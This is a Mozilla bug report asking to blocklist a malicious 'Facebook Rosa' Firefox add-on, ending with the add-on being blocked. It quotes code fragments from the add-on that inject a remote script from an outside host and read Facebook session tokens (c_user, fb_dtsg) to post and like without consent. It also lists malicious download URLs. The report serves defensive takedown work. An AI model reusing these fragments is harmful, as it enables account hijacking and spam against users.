Closed Bug 743484 Opened 13 years ago Closed 13 years ago

Malicious "Facebook Rosa" add-on

Categories

(Toolkit :: Blocklist Policy Requests, defect)

Product:
Toolkit
Component:
Blocklist Policy Requests
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: mhammell, Assigned: jorgev)

Details

Attachments

(1 file)

20120407_rosathemenplus.zip
156.41 KB, application/octet-stream
Details
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19 Steps to reproduce: Downloaded add-on from http://rosathemenplus.com/plugin.xpi Actual results: Report for http://rosathemenplus.com/plugin.xpi ** Summary ** On install, it will begin programmatically sending spam to your Facebook friends and have you like pages, all without your knowledge or consent. ** Embedded and Remote Files ** lib.js http://temasuperplugin.info?'+Math.random() <http://temasuperplugin.info/?'+Math.random()> icon48.png icon16.png icon128.png manifest.json ** Embedded Metadata ** ** Files Loaded ** ** Remote Javascript Loaded ** ...(a=(b=document).createElement('script')).src='http://temasuperplugin.in <http://temasuperplugin.in/> fo?'+Math... "description": "Verwandeln Sie Ihr Facebook in rosa!", "content_scripts": [ ** Facebook Paths Accessed ** ... F m"}9(3.2.4("o.5/b/a/q.6")!=-1||3.2.4("/b/a/s.6")!=-1){m.3.2=\'7://f.5/t.6?g \'... ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) { "name": "Facebook: Rosa Themen-Plugin", "description": "Verwandeln Sie Ihr Facebook in rosa!", ** Facebook Data Accessed ** var fb_dtsg = Env.fb_dtsg; user_id = readCookie('c_user'); ...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... var fb_dtsg = Env.fb_dtsg; ..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... user_id = readCookie('c_user'); ** HTTP Requests ** var c = new XMLHttpRequest(); ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... c['open']('POST', d, true); var c = new XMLHttpRequest(); c['open']('POST', d, true); ** All URLs Loaded or Mentioned ** ...var blog = "http://rosaausgabepro.com/farbe/" + randomFromTo(8601,8800) + ".php"... ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; ...document).createElement('script')).src='http://temasuperplugin.info?'+M <http://temasuperplugin.info/?'+M> ath.rando... "update_url": "http://rosaplugin.info/chrome.xml", Expected results: It should not post Facebook messages or like pages without your knowledge or consent.
ID: pink@rosaplugin.info
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i84
Status: ASSIGNED → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
hi can you ban this spammer addon too http://faceeklenti.com/ http://faceeklenti.com/firefox.php http://faceeklenti.com/eklenti/facebook.xpi you may not access the website by having turkish ip address you can try access to site by http://www.gizlen.net/ a turkish web based proxy
Please read the blocklisting guidelines (https://wiki.mozilla.org/Blocklisting) and file a new blocklist bug if you think it matches our requisites.
Product: addons.mozilla.org → Toolkit
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: